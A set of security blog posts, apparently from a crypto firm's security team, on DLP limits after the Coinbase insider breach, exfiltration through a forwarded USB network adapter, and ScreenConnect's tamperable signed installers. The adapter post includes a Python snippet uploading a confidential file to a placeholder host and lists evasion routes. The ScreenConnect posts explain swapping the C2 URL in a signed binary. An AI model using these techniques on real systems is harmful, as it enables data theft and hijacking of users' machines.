Coinbase and the limits of DLP

In May, the world learned that Coinbase lost user data. Owing to disclosure requirements that apply to publicly traded companies in the US, the company was compelled to issue a “confessional” SEC filing and an associated blog post breaking the news. Unnamed attackers had been extorting the company, threatening to release private information on customers stolen from an offshore customer-support vendor. Much as the announcement tried to put a brave face on the debacle and downplay the severity by pointing out that less than 1% of all customers were impacted, it was also notable for key omissions. For starters, it turned out that the one percent was not exactly random. Attackers had carefully targeted the most valuable customers: those with high-balance accounts, of greatest value to criminals interested in stealing cryptocurrency through social engineering.

While Coinbase was not upfront about what exactly went on, later reporting from Reuters and Fortune shed more light on the incident. It turned out the breach occurred in a decidedly low-tech fashion: Coinbase had outsourced its customer-support function to TaskUs, a business process outsourcing (BPO) company that operated support centers offshore, where wages are much lower than for comparable US jobs. Some of those support representatives were bribed to funnel data over to the threat actor. These contractors did not have to “hack” anything any more than Edward Snowden had to breach anything at the NSA: by design, they were trusted insiders granted privileged access to Coinbase administrative systems to do their daily jobs.

Granted, having access to customer data on your work machine is one thing. Shipping thousands of records from there to co-conspirators halfway around the world unnoticed is another. There is a slew of enterprise security products dedicated to making sure that does not happen. They are marketed under the catchy phrase DLP or “data-leak prevention.”

If we are being uncharitable, the DLP threat model can be summed up in one motto: “We catch the dumb ones.” These controls excel at stopping, or at least detecting, confidential information leaving the environment when the perpetrator makes no attempt to cover their tracks or lacks the opsec skills to do so. Examples of rookie moves include the following (a sketch of the kind of rule that catches them appears after the list):

  • Sending an email to your personal account from the corporate system, with a Word document attached containing the word “confidential”
  • Uploading the same document to Dropbox or Box (assuming those services are not sanctioned by the corporate IT environment, as would be the case when a company has settled on Google Workspace or Office 365 for its cloud storage)
  • Creating a zip archive of an internal code repository and copying that to a removable USB drive.
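
To make the point concrete, here is a minimal sketch (in Python, with hypothetical keywords and file names) of the kind of static pattern matching a DLP content filter applies to outbound attachments. Trivial obfuscation such as renaming, a password-protected archive, or simply photographing the screen sails right past it.

import re
import zipfile

# Hypothetical keyword rule of the sort a naive DLP content filter might apply.
KEYWORDS = re.compile(rb"confidential|internal use only|do not distribute", re.IGNORECASE)

def flag_attachment(path: str) -> bool:
    """Return True if an outbound attachment trips the naive keyword rule."""
    with open(path, "rb") as f:
        if KEYWORDS.search(f.read()):
            return True
    # Office documents (.docx, .xlsx) are zip containers; peek inside as well.
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as z:
            return any(KEYWORDS.search(z.read(name)) for name in z.namelist())
    return False

print(flag_attachment("quarterly-plan.docx"))  # hypothetical attachment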

Most DLP systems will sound the alarm when attackers are this inexperienced or brazen. But as soon as the slightest obfuscation or tradecraft is introduced, they can become surprisingly oblivious to what is happening.

Returning to the Coinbase incident: a natural question is whether TaskUs employed any DLP solutions, and if so, how the rogue insiders bypassed them so effectively that Coinbase remained oblivious as customer data went out the door for months. Not much has come to light about the exact IT environment of TaskUs. Were they running Windows or Macs? Did they have an old-school Active Directory setup or was the fleet managed through a more modern, cloud-centric service such as Microsoft 365? There is good reason to expect the answers will be underwhelming. Customer support is outsourced overseas for one reason: reducing labor cost. It is unlikely that these shoestring-budget operations, with their obsession with cost-cutting, will be inclined to invest in fancy IT environments and robust security controls.

Yet it may not have mattered in the end. Some key details later emerged from an investigative piece on how the first handful of corrupt insiders were initially caught in January 2025— four months before Coinbase deigned to notify customers or investors about the extent of the problem. According to the Reuters article:

“At least one part of the breach, publicly disclosed in a May 14 SEC filing, occurred when an India-based employee of the U.S. outsourcing firm TaskUs was caught taking photographs of her work computer with her personal phone, according to five former TaskUs employees.”

This is a stark reminder of the limitations of endpoint controls in general, not to mention the sheer futility of DLP technologies for protecting low-entropy information. TaskUs could have installed the kitchen sink of DLP solutions and not one of them would have made a difference for this specific attack vector. Equally misguided are the calls for draconian restrictions on employee machines that surface every time insider risk comes up, as it must have for security teams in the aftermath of the Coinbase incident. It is possible to prevent screen-sharing and screenshots for specific URLs (Google advertises enterprise controls for doing this in Chrome— assuming the IT department can reliably block all other browsers) or to funnel all network traffic through a cloud proxy that only allows access to “known-good” websites. None of these prevent a disgruntled insider from using their phone to take a picture of their desktop. For that matter, they can not stop a determined employee from memorizing short fragments of private information, such as the social-security number or address of a high-net-worth customer. This is much easier than trying to exfiltrate gigabytes of confidential documents or source code. Should customer support centers discriminate against candidates with good memorization skills?

To be clear, this is not an argument for throwing in the towel. There are standard precautions TaskUs could have taken given their threat model. Start with a policy against bringing personal devices into the workspace. This would at least have forced the malicious insiders to use company devices for exfiltration, giving DLP systems a fighting chance to catch them if they stumbled. But even then, cameras are becoming ubiquitous in consumer electronics. Are employees not allowed to wear Meta Ray-Ban glasses? For that matter, cameras are increasingly easy to conceal. Was that employee inspired to wear a three-piece suit to work today, or is there a pinhole camera pointed at the screen hiding under that button?

In one sense, TaskUs and Coinbase were lucky. Customer service reps worked in a shared office space. They could witness and report on colleagues acting suspiciously. Consider how this would have played out during the pandemic, or in any arrangement where employees work remotely with the same level of access minus the deterrence of other people observing their actions.

CP

The mystery network interface: unexpected exfiltration paths

This is a story about accidentally stumbling on a trivial exfiltration path out of an otherwise locked-down environment. Our setting is a multi-national enterprise with garden-variety, Windows-centric IT infrastructure and one modern twist: instead of physical workstations on desks or laptops, employees are issued virtual desktops. They connect to these Windows VMs to work from anywhere, getting a consistent experience whether they are sitting in their assigned office, visiting one of the company’s worldwide locations or working from the comfort of home— a lucky break that allowed for uninterrupted access during the pandemic.

Impact of virtualization

Virtualization makes some problems easier. It is an improvement over issuing employees laptops that leave the premises every night and get used in the privacy of a residence without any supervision. Laptops can be stolen, stay offline for extended periods without security updates, connect to dubious public networks or interface with random hardware— printers, USB drives, docking stations, Bluetooth speakers— all of which create novel ways to lose company data resident on the device. These risks are not insurmountable; there are well-understood mitigations for managing each one. For example, full-disk encryption protects against offline recovery of data from the disk in case of theft. But each one must be addressed by the defenders. Virtual desktops are immune from entire classes of attacks applicable to physical devices that wander outside the trusted perimeter.

But virtualization can also introduce complications into other classic enterprise security challenges. Data leak prevention, or DLP, is one this particular firm obsessed over. Most modern startups are far more concerned about external threat actors trying to sneak inside the gates and rampage through precious resources within the perimeter. Businesses founded on intellectual property prioritize a different threat model: attackers already inside the perimeter moving confidential corporate data outside. Usually this is framed in the context of insider malfeasance: rogue employees jumping ship to a competitor and trying to take some of the secret sauce with them. But under a more charitable interpretation, it can also be viewed as defense-in-depth against an external attacker who compromises the account of an otherwise honest insider with the intention of rummaging through corporate IP. In all cases, defenders must focus on all possible exfiltration paths— avenues for communicating with the “outside world”— and implement controls on each channel.

Sure enough, the IT department spent an inordinate amount of time doing exactly that. For example, all connections to the Internet are funneled through a corporate proxy. When necessary that proxy executes a man-in-the-middle attack on TLS connections to view encrypted traffic. (No small irony that activity that would constitute a criminal violation of US wiretap statutes in a public setting has become standard practice for IT departments possessed of a particular mindset around network security.) This setup affords both proactive defense and detection after the fact:

  1. Outright block connections to file-sharing sites such as Dropbox and Box to prevent employees from uploading company documents to unsanctioned locations. (The dreaded “shadow IT” problem.)
  2. Even for sites where connections are permitted, log the full history of connections and the type of HTTP activity (GET vs POST vs PUT), including a hash of the content exchanged. This allows identifying an employee after the fact if they go on an upload spree to copy company IP from the internal environment to a cloud service.

Rearranging deck chairs

In other ways virtualization does not change the nature of risk but merely reshuffles it downstream, to the clients used for connecting to the machine where the original problem used to live.

This enterprise allowed connections from unmanaged personal devices. It goes without saying there will be little assurance about the security posture of a random employee device. (Despite the long history of VPN clients trying to encroach on device management under the guise of “network health checks,” where connections are only permitted for client devices “demonstrating” their compliance with corporate policies.) One way to solve this problem is by treating the remote client as untrusted: isolate content on the virtual desktop as much as possible from the client, effectively presenting a glorified remote GUI.

There is a certain irony here. Remote desktop access solutions have gotten better over time at supporting deeper integration with client-side hardware. For example, over the years Microsoft RDP has added the ability to:

  • Share local drives with the remote machine
  • Use a locally attached printer to print
  • Allow local smart-cards to be used for logging into the remote system
  • Allow pasting from the local clipboard to the remote machine, or vice versa by pasting content from the remote PC locally
  • Forward any local USB device, such as a webcam, to the remote target
  • Provide GPU acceleration to remote sessions via RemoteFX vGPU

These are supposed to be beneficial features: they improve productivity when using a remote desktop for computing. Yet they become trivial exfiltration vectors in the hands of a disgruntled employee trying to take corporate IP off their machine.
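
Most of these integrations are toggled by plain-text settings in the .rdp connection file or equivalent group policy. Below is a minimal sketch of auditing a connection file for redirection options that double as exfiltration channels; the option list is illustrative rather than exhaustive.

# Flag device-redirection settings in a .rdp file. Option names below are the
# common Microsoft RDP file settings; adjust for the remote-access client in use.
RISKY_SETTINGS = {
    "drivestoredirect",      # share local drives with the remote machine
    "redirectclipboard",     # clipboard in both directions
    "redirectprinters",      # local printers
    "usbdevicestoredirect",  # arbitrary USB forwarding
    "redirectcomports",      # serial/COM ports
}

def audit_rdp_file(path: str) -> list[str]:
    findings = []
    # .rdp files may be UTF-16 with a BOM; this sketch assumes UTF-8/ASCII.
    with open(path, encoding="utf-8-sig", errors="ignore") as f:
        for line in f:
            key, _, value = line.strip().partition(":")
            if key.lower() in RISKY_SETTINGS and not value.endswith(":0"):
                findings.append(line.strip())
    return findings

print(audit_rdp_file("work-desktop.rdp"))  # hypothetical connection file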

The mystery NIC

Fast forward to an employee connecting to their virtual desktop from home. Using the officially sanctioned VPN client and remote-desktop software anointed by the IT department, this person logs into their work PC as usual. Later on in the session, an unexpected OS notification appears regarding the discovery of an unknown network. That innocuous warning in fact signals a glaring oversight in exfiltration controls.

Peeking at “Network Connections” in Control Panel confirms the presence of a second network interface:

Network interfaces: the more, the merrier?

The appearance of the mystery NIC can be traced to an interaction between two routine actions:

  1. The employee connected their laptop to a docking station containing an Ethernet adapter. This is not an uncommon setup, since docking allows use of a larger secondary monitor and external keyboard/mouse for better ergonomics.
  2. The remote-desktop client was configured to forward newly connected USB devices to the remote server. This is also a common setup: it singles out devices intended for redirection by the explicit action of plugging them in after the session is created.
Microsoft RDP client settings for forwarding local devices. (Other remote-access clients have comparable features.)

The second point requires some qualification. While arbitrary USB forwarding over RDP is clearly risky, it is necessary to forward some classes of devices. For instance, video conferencing requires a camera and microphone. Virtual desktops do not have any audio or video devices of their own. (Even if such emulated devices did exist and received synthetic A/V feeds, they would be useless for projecting the real audio/video from the remote user.) That makes a blanket ban on USB forwarding infeasible. Instead defenders are forced to carefully manage exceptions by device class.

It turns out in this case the configuration was too permissive: it allowed forwarding USB network adapters.

Free for all

On the remote side, once Windows detects the presence of an additional USB device, plug-and-play (once derided as plug-and-pray) works its magic:

  1. Device class is identified
  2. Appropriate device driver is loaded. There was an element of luck here in that the necessary driver was already present out-of-the-box on Windows, avoiding the need to search for and download the driver via Windows Update. (Even that step is automatic on Windows for drivers that have passed WHQL certification.)
  3. Network adapter is initialized
  4. DHCP is used to acquire an IP address

Depending on group policy, some security controls continue to apply to this connection. For example, Windows firewall rules will still be in effect and can block inbound connections. But anything else not explicitly forbidden by policy will work. This is an important distinction. It turns out the reason many obvious exfiltration paths fail in the standard enterprise setup is an accident of network architecture, not deliberate endpoint controls. For instance, users can not connect to a random SMB share on the Internet because there is no direct route from the internal corporate network. By contrast, mounting file-shares works just fine inside the trusted intranet environment; the difference is one of reachability. Similar observations apply to outbound SSH, SFTP, RDP and all other protocols except HTTP/HTTPS. (Because web access is critical to productivity, almost every enterprise fields dedicated forward proxies to sustain the illusion that every server on the Internet can be accessed on ports 80/443.) Most enterprises will not restrict connections using these protocols because of an implicit assumption that any host reachable on those ports is part of the trusted environment.

A secondary network interface changes that, opening another path for outbound connections. This one is no longer constrained by the intranet setup assumed by the IT department. Instead it depends on the network that the USB Ethernet adapter is attached to— one controlled by the adversary in this threat model. In the extreme case, it is wide open to connections from the internet. More realistically, the virtual desktop will appear as yet another device on the LAN segment of a home network. In that case there will be some restrictions on inbound access but nothing preventing outbound connections.

Exfiltration possibilities are endless:

  1. Hard copies of documents can be printed to a printer on the local network.
  2. Network drives such as NAS units can be mounted as SMB shares, allowing easy drag-and-drop copying from the virtual desktop.
  3. To stay under the radar, one can deploy another device on the local network to act as an SFTP server. On the virtual desktop side, an SFTP client such as PuTTY’s psftp or Windows’ own SSH client (standard on recent Win10/11 builds) can then upload files to that server. While activity involving file-shares and copying via Windows tends to be closely watched by resident EDR software, SFTP is unlikely to leave a similar audit trail.
  4. For those committed to GUI-based solutions, outbound RDP also works. One could deploy another Windows machine with remote access enabled on the home network to act as the drop point for files. Then an RDP connection can be initiated from the virtual desktop, sharing the C:\ drive to the remote target. This makes the entire contents of the virtual desktop available to the unmanaged PC. While inbound RDP is disallowed from sharing drives, there are typically no such restrictions on outbound RDP— yet another artifact of the assumption that such connections can only work inside the safe confines of the trusty intranet, where every possible destination is another managed enterprise asset.
  5. For a much simpler but noisier solution, vanilla cloud-storage sites (Box, Dropbox, …) will also be accessible through the secondary interface. When connections are not going through the corporate proxy, rules designed to block file-sharing sites have no effect. Since most of these websites offer file uploads through the web browser, no special software or dropping to a command line is required.
    • Caveat: It may take some finessing to get existing software on the remote desktop to use the second interface. While command line utilities such as curl accept arguments to specify the interface used for initiating connections, browsers rarely expose that level of control. (A scripted example follows this list.)
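
A minimal sketch of forcing traffic out of the secondary interface by binding the source address, using only the Python standard library. The addresses, host name and file path are hypothetical placeholders.

import http.client

SECONDARY_NIC_IP = "192.168.1.57"   # address DHCP assigned on the home LAN (hypothetical)
DROP_HOST = "files.example.com"     # server reachable via the secondary interface

# Binding source_address pins the connection to the forwarded adapter,
# bypassing the corporate proxy and its logging entirely.
conn = http.client.HTTPSConnection(DROP_HOST, source_address=(SECONDARY_NIC_IP, 0))
with open(r"C:\work\confidential.docx", "rb") as f:
    conn.request("PUT", "/upload/confidential.docx", body=f,
                 headers={"Content-Type": "application/octet-stream"})
print(conn.getresponse().status)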

These possibilities highlight a general point about the attackers’ advantage when it comes to preventing exfiltration from a highly connected environment. When a miss is as good as a mile, the fragility (futility?) of DLP solutions should prompt customers to question whether this mitigation can amount to anything more than bureaucratic security theater.

CP

ScreenConnect: “unauthenticated attributes” are not authenticated

(Lessons from the ScreenConnect certificate-revocation episode)

An earlier blog post recounted the discovery of threat actors leveraging the ScreenConnect remote assistance application in the wild, and events leading up to DigiCert revoking the certificate previously issued to the vendor ConnectWise for signing those binaries. This follow-up is a deeper, more technical dive into a design flaw in the ScreenConnect executable that made it particularly appealing for malicious campaigns.

Trust decisions in an open ecosystem

Before discussing what went wrong with ScreenConnect, let’s cover the “sunny-day path,” or how code-signing is supposed to work. To set context, let’s rewind the clock ~20 years, back to when software distribution was far more decentralized. Today most software applications are purchased through a tightly controlled app store such as the one Apple operates for Macs and iPhones. In fact mobile devices are locked down to such an extent that it is not possible to “side-load” applications from any other source without jumping through hoops. But this was not always the case, and certainly not for the PC ecosystem. Sometime in the late 1990s, with the mass adoption of the Internet, downloading software increasingly replaced the purchase of physical media. While anachronistic traces of “shrink-wrap licenses” survive in the terminology, few consumers were actually removing shrink-wrapping from a cardboard box containing installation CDs. More likely their software was downloaded using a web browser directly from the vendor website.

That shift had a darker side: it was a boon for malware distribution. Creating packaged software with physical media takes time and expense. Convincing a retailer to devote scarce shelf-space to that product is an even bigger barrier. But anyone can create a website and claim to offer a valuable piece of software, available for nothing more than the patience required for slow downloads over the meager “broadband” speeds of the era. Platform vendors even encouraged this model: Sun pushed Java applets in the browser as a way to add interactivity to static HTML pages. Applets were portable: written for the Java Virtual Machine, they could run just as well on Windows, Mac and the 37 flavors of UNIX in existence at the time. MSFT predictably responded with a Windows-centric take on this perceived competitive threat against the crown jewels: ActiveX controls. These were effectively native code shared libraries, with full access to the Windows API. No sandboxing, no restrictions once execution started. A perfect vehicle for malware distribution.

Code-signing as panacea?

Enter Authenticode. Instead of trying to constrain what applications can do once they start running, MSFT opted for a black & white model for trust decisions made at installation time, based on the pedigree of the application. Authenticode is a code-signing standard that can be applied to any Windows binary: ActiveX controls, executables, DLLs, installers, Office macros and, through an extensibility layer, even third-party file formats, although there were few takers outside of the Redmond orbit. (Java continued to use its own cross-platform JAR signing format on Windows, instead of the “native” way.) It is based on public-key cryptography and PKI, much like TLS certificates. Every software publisher generates a key-pair and obtains a digital certificate from one of a handful of trusted “certificate authorities.” The certificate associates the public-key with the identity of the vendor, for example asserting that a specific RSA public-key belongs to Google. Google can use its private-key to digitally sign any software it publishes. Consumers downloading that software can then verify the signature to confirm that the software was indeed written by Google.
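
Stripped of the Windows-specific packaging, the underlying sign/verify flow is plain public-key cryptography. A conceptual sketch using the Python cryptography package; in practice the public key travels inside an X.509 certificate chaining to a trusted CA rather than as raw bytes, and the binary contents below are a placeholder.

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

# Publisher side: generate a key-pair (done once, with the public half
# certified by a CA) and sign the bytes of the binary.
publisher_key = rsa.generate_private_key(public_exponent=65537, key_size=3072)
binary = b"...contents of the installer..."   # placeholder for the real file
signature = publisher_key.sign(binary, padding.PKCS1v15(), hashes.SHA256())

# Consumer side: verify the signature against the certified public key.
# verify() raises InvalidSignature if even one bit of the binary changed.
publisher_key.public_key().verify(signature, binary, padding.PKCS1v15(), hashes.SHA256())
print("signature verified")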

A proper critique of everything wrong with this model— starting with its naive equation of “identified vendor” to “trusted/good” software you can feel confident installing— would take a separate essay. For the purposes of this blog post, let’s suspend disbelief and assume that reasonable trust decisions can be made based on a valid Authenticode signature. What else can go wrong?

Custom installers

One of the surprising properties of the ScreenConnect installer is that the application is completely turnkey: after installation, the target PC is immediately placed under remote control of a particular customer. No additional configuration files to download, no questions asked of end users. (Of course this property makes ScreenConnect as appealing to malicious actors as it is to IT administrators.) That means the installer has all the necessary configuration included somehow. For example it must know which remote server to connect to for receiving remote commands. That URL will be different for every customer.

By running strings on the application, we can quickly locate this XML configuration.
For the malicious installer masquerading as the bogus River “desktop app”:

This means ScreenConnect is somehow creating a different installer on-demand for every customer. The UI itself appears to support that thesis. There is a form with a handful of fields you can complete before downloading the installer. Experiments confirm that a different binary is served when those parameters are changed.
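
The same observation can be reproduced with a few lines of Python instead of strings(1): search the installer for the embedded XML configuration and note how close to the end of the file it sits. The file name matches the sample discussed later in this post; the search pattern is illustrative.

import re

with open("RiverApp.ClientSetup.exe", "rb") as f:
    data = f.read()

# Look for XML fragments among the printable bytes and report their offsets.
for match in re.finditer(rb"<\?xml[ -~]{0,120}", data):
    print(f"offset {match.start()} of {len(data)} bytes: {match.group()!r}")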

That would also imply that ConnectWise must be signing binaries on the fly. A core assumption in code-signing is that a digitally signed application can not be altered without invalidating that signature. (If that were not true, signatures would become meaningless. An attacker could take an authentic, benign binary, modify it to include malicious behavior and have that binary continue to appear as the legitimate original. There have been implementation flaws in Authenticode that allowed such changes, but these were considered vulnerabilities and addressed by Microsoft.)

But using osslsigncode to inspect the signature in fact shows:

    1. All binaries have the same timestamp. (Recall this is a third-party timestamp, effectively a countersignature, provided by a trusted third party, very often a certificate authority.)

    2. All binaries have the same hash for the signed portion

Misuse of unauthenticated attributes

That second property requires some explanation. In an ideal world the signature would cover every bit of the file— except itself, to avoid a self-referential loop. There are indeed some simple code-signing standards that work this way: raw signature bytes are tacked on at the end of the file, offloading all complexity around format and key-management (which certificate should be used to verify this signature?) to the verifier.

While Authenticode signatures also appear at the end of binaries, their format is on the opposite end of the spectrum. It is based on a complex standard called Cryptographic Message Syntax (CMS) which also underlies other PKI formats, including S/MIME for encrypted/signed email. CMS defines complex nested structures encoded using a binary format called ASN.1. A typical Authenticode signature features:

  • Actual signature of the binary from the software publisher
  • Certificate of the software publisher generating that signature
  • Any intermediate certificates chaining up to the issuer required to validate the signature
  • Time-stamp from trusted third-party service
  • Certificate of the time-stamping service & additional intermediate CAs

None of these fields are covered by the signature. (Although the time-stamp itself covers the publisher signature, as it is considered a “counter-signature.”) More generally, CMS defines a concept of “unauthenticated attributes”: these are parts of the file not covered by the signature and, by implication, can be modified without invalidating the signature.

It turns out the ScreenConnect authors made a deliberate decision to abuse the Authenticode format: they place the configuration in one of these unauthenticated attributes. The first clue to this comes from dumping strings from the binary along with the offsets where they occur. In a 5673KB file the XML configuration appears within the last 2 kilobytes— the region where we expect to find the signature itself.

The extent of this anti-pattern becomes clear when we use “osslsigncode extract-signature” to isolate the signature section:

$ osslsigncode extract-signature RiverApp.ClientSetup.exe RiverApp.ClientSetup.sig
Current PE checksum   : 005511AE
Calculated PE checksum: 0056AFC0
Warning: invalid PE checksum
Succeeded

$ ls -l RiverApp.ClientSetup.sig
-rw-rw-r-- 1 randomoracle randomoracle 122079 Jun 21 12:35 RiverApp.ClientSetup.sig

122KB? That far exceeds the amount of space any reasonable Authenticode signature could take up, even including all certificate chains. Using the openssl pkcs7 subcommand to parse this structure reveals the culprit for the bloat at offset 10514:

There is a massive ~110K section using the esoteric OID “1.3.6.1.4.1.311.4.1.1”. (The prefix 1.3.6.1.4.1.311 is reserved for MSFT; any OID starting with that prefix is specific to Microsoft.)

Looking at the ASN.1 value we find a kitchen sink of random content (a short script for enumerating these attributes follows the list):

  • More URLs
  • Additional configuration as XML files
  • Error messages encoded in Unicode (“AuthenticatedOperationSuccessText”)
  • English UI strings as ASCII strings (“Select Monitors”)
  • Multiple PNG image files
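
Enumerating the unauthenticated attributes programmatically is straightforward with the same asn1crypto package used in the grafting proof-of-concept mentioned below. A minimal sketch, assuming the signature blob extracted above is DER-encoded:

from asn1crypto import cms

# Load the PKCS#7/CMS blob produced by "osslsigncode extract-signature".
with open("RiverApp.ClientSetup.sig", "rb") as f:
    content_info = cms.ContentInfo.load(f.read())

signer = content_info["content"]["signer_infos"][0]

# Walk the unauthenticated ("unsigned") attributes: OID plus encoded size.
# This is where the ~110K of configuration, strings and PNGs lives.
for attr in signer["unsigned_attrs"]:
    print(attr["type"].dotted, len(attr["values"].dump()), "bytes")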

It’s important to note that ScreenConnect went out of its way to do this. This is not an accidental feature one can stumble into. Simply tacking on 110K at the end of the file will not work. Recall that the signature is encapsulated in a complex, hierarchical data structure encoded in ASN.1. Every element contains a length field. Adding anything to this structure requires updating the length field for every enclosing element. That’s not simple concatenation: it requires precisely controlled edits to ASN.1. (For an example, see this proof-of-concept that shows how to “graft” the unauthenticated attribute section from one ScreenConnect binary to another using the Python asn1crypto module.)

The problem with mutable installers

The risks posed by this design become apparent when we look at what ScreenConnect does after installation: it automatically grants control of the current machine to a remote third-party. To make matters worse, this behavior is stealthy by design. As discussed in the previous blog post, there are no warnings, no prompts to confirm intent and no visual indicators whatsoever that a third-party has been given privileged access.

That would have been dangerous on its own— ripe for abuse if a ScreenConnect customer uses that binary for managing machines that are not part of their enterprise. At that point it crosses the line from “remote support application” into “remote administration Trojan,” or RAT, territory. But the ability to tamper with configuration in a signed binary gives malicious actors even more leeway. They do not even need to be a ScreenConnect customer. All they need to do is get their hands on one signed binary in the wild. They can now edit the configuration residing in the unauthenticated ASN.1 attribute, changing the URL for the command & control server to one controlled by the attacker. The Authenticode signature continues to validate and the tampered binary will still get the streamlined experience from Windows: one-click install without an elevation prompt. But instead of connecting to a server managed by the original ScreenConnect customer, it will now connect to the attacker’s command & control server to receive remote commands.

Resolution

This by-design behavior in ScreenConnect was deemed such a high risk that the certificate authority (DigiCert) that issued ConnectWise their Authenticode certificate took the extraordinary step of revoking the certificate and invalidating all previously signed binaries. ConnectWise was forced to scramble and coordinate a response with all customers to upgrade to a new version of the binary. The new version no longer embeds critical configuration data in unauthenticated signature attributes.

While the specific risk with ScreenConnect has been addressed, it is worth pointing out that nothing prevents similar installers from being created by other software publishers. No changes have been made to Authenticode verification logic in Windows to reject extra baggage appearing in signatures. It is not even clear if such a policy can be enforced. There is enough flexibility in the format to include seemingly innocuous data such as extra self-signed certificates in the chain. For that matter, even authenticated fields can be used to carry extra information, such as the optional nonce field in the time-stamp. For the foreseeable future it is up to each vendor to refrain from using such tricks and creating installers that can be modified by malicious actors.

CP

Acknowledgments: Ryan Hurst for help with the investigation and escalating to DigiCert

The story behind ScreenConnect certificate revocation

An unusual phishing site

In late May, the River security team received a notification about a new fraudulent website impersonating our service. Phishing is a routine occurrence that every industry player contends with. There are common playbooks invoked to take down offending sites when one is discovered.

What made this case stand out was the tactic employed by the attacker. Most phishing pages go after credentials. They present a fraudulent authentication page that mimics the real one, asking for passwords or OTP codes for 2FA. Yet the page we were alerted about did not have any way to log in. Instead, it advertised a fake “River desktop app.” River publishes popular mobile apps for iOS and Android, but there has never been a desktop application for Windows, macOS, or Linux.

As this screenshot demonstrates, the home page was subtly altered to replace the yellow “Sign up” button on the upper-right corner with one linking to the bogus desktop application. We observed the site always serves the same Windows app, regardless of the web browser or operating system used to view the page. Google Chrome on macOS and Firefox on Linux both received the same Windows binary, despite the fact that it could not have run successfully on those platforms.

This looked like a bizarre case of a threat actor jumping through hoops to write an entire Windows application to confuse River clients. Native Windows applications are a rare breed these days— most services are delivered through web or mobile apps. The story only got stranger once we discovered the application carried a valid code signature.

Authentic malware

Quick recap on code signing: Microsoft has a standard called “Authenticode” for digitally signing Windows applications. These signatures establish the provenance and integrity of the software, proving authorship and guaranteeing that the application has not been tampered with since the original version was published. This is crucial for making trust decisions in an open ecosystem where applications may be sourced from anywhere, not just a curated app store.

Authenticode signatures can be examined on non-Windows platforms using the open-source osslsigncode utility. This binary was signed by ConnectWise, using a valid certificate issued in 2022 by DigiCert:

Windows malware is pervasive, but malware bearing a valid digital signature is less common, and short-lived. Policies around code-signing certificates are clear on one point: if a certificate is shown to have been used to sign harmful code, the certificate authority is obligated to revoke it. (Note that code-signing certificates are governed by the same CAB Forum that sets issuance standards for TLS certificates, but under a different set of rules than the more common TLS use-case.)

ConnectWise is a well-known company that has been producing software for IT support for over a decade. As it is unlikely for such a reputable business to operate malware campaigns on the side, our first theory was a case of key compromise: a threat actor obtained the private keys belonging to ConnectWise and started signing their own malicious binaries with them. This is the most common explanation for malware that is seemingly published by reputable companies: someone else took their keys and certificate. Perhaps the most famous case was the Stuxnet malware targeting Iran’s nuclear enrichment program in 2010, using Windows binaries signed with valid certificates of two Taiwanese companies with no relationship to either the target or the (presumed) attackers.

Looking closer at the “malware” served from the fraudulent website we were investigating, we discovered something even more bizarre: the attackers did not go to the trouble of writing a new application from scratch or even vibe-coding one with AI. This was the legitimate ScreenConnect application published by ConnectWise, served up verbatim, simply renamed as a bogus River desktop application.

That was not an isolated example. On the same server, we discovered samples of the exact same binary relabeled to impersonate additional applications, including a cryptocurrency wallet. We are far from being the first or only group to observe this in the wild. Malwarebytes noted social-security scams delivering the ScreenConnect installer in April this year, and Lumu published an advisory around the same time.

Fine line between remote assistance and RAT

ScreenConnect is a remote-assistance application for Windows, Mac, and even Linux systems. Once installed, it allows an IT department to remotely control a machine, for example by deploying additional software, running commands in the background, or even joining an interactive screen-sharing session with the user to help troubleshoot problems. 

Below is an example of what an IT administrator might see on the other side when using the server-side of ScreenConnect, either self-hosted or via a cloud service provided by ConnectWise. 

Example remote command invocation via ScreenConnect dashboard. Note commands are executed as the privileged NT AUTHORITY\SYSTEM user on the target system.

At least this is the intended use case. From a security perspective, ScreenConnect is a classic example of a “dual-use application.” In the right hands, it can deliver a productivity boost to overworked IT departments, helping them provide better support to their colleagues. In the wrong hands, it becomes a weapon for malicious actors to remotely compromise machines belonging to unsuspecting users. To be clear: ScreenConnect is not alone in this capacity. There are multiple documented instances of remote-assistance apps repurposed by threat actors at scale to remotely commandeer PCs of users they had no relationship with. But there are specific design decisions in the ScreenConnect installer as well as the application itself that greatly amplify the potential for abuse:

  • The installation proceeds with no notice or consent. Because the binary carries a valid Authenticode signature, elevation to administrator privileges is automatic. Once elevated, there are no additional warnings or indications, nothing to help the consumer realize they are about to install a dangerous piece of software and cede control of their PC to an unknown third-party.
  • Once installed, remote control takes effect immediately. No reboot required, no additional dialog asking users to activate the functionality.
  • There is no indication that the PC is under remote management or that remote commands are being issued. For example, there is no system tray icon, notification, or other visual indicator. (Compare this to how screen sharing— far less intrusive than full remote control— works with Zoom or Google Meet: users are given a clear indication that another participant is viewing their screen, along with a link to stop sharing any time.)
  • There is no desktop icon or Windows menu entry created for ScreenConnect. For a customer who was expecting to get the River desktop app, it looks like the installation silently failed because their desktop looks the same as before. To understand what happened, users would have to visit the Windows control panel, review installed programs and observe that an unexpected entry called “ScreenConnect” has appeared there.
After installation, no indication that ScreenConnect is present on the system.
  • Compounding these client-side design decisions, ScreenConnect was offering a 14-day free trial with nothing more than a valid email address required to sign up. [The trial page now states that it is undergoing maintenance— last visited June 15th.] A threat actor could take advantage of this offer to download customized installers such that upon completion, the machine where the installer ran would be under the control of that actor. (It is unclear if the threat actor impersonating River used a free trial with the cloud instance, or if they compromised a server belonging to an existing ScreenConnect customer. Around the same time that we found malware masquerading as a River desktop application, CISA issued a warning about a ScreenConnect server vulnerability being exploited in the wild.)

Disclosure timeline

  • May 30: Emails sent to security@ aliases for ScreenConnect and ConnectWise. No acknowledgment received in response.
    • We later determined that the company expects to receive vulnerability disclosures at a different email alias, and our initial reports did not reach the security team.
  • Jun 1: Ryan Hurst helped escalate the issue to DigiCert and outlined why this usage of a code-signing certificate contravenes CAB Forum rules. 
  • Jun 2: DigiCert acknowledged receiving the report of our investigation.
  • Jun 3: DigiCert confirms the certificate has been revoked.
    • Initial revocation time was set to June 3rd. Because Authenticode signatures also carry a trusted third-party timestamp, it is possible to revoke binaries forward from a specific point in time. This is useful when a specific key-compromise date can be identified: all binaries time-stamped before that point remain valid, all later binaries are invalidated. The malicious sample found in the wild masquerading as a River desktop app was timestamped March 20th. The most recent version of the ScreenConnect binary obtained via the trial subscription bears a timestamp of May 20th. Setting the revocation time to June 3rd has no effect whatsoever on the validity of existing binaries in the wild, including those repurposed by malicious actors.
  • Jun 4: DigiCert indicates the revocation timestamp will be backdated to the issuance date of the certificate (2022) once ConnectWise has had additional time to publish a new version.
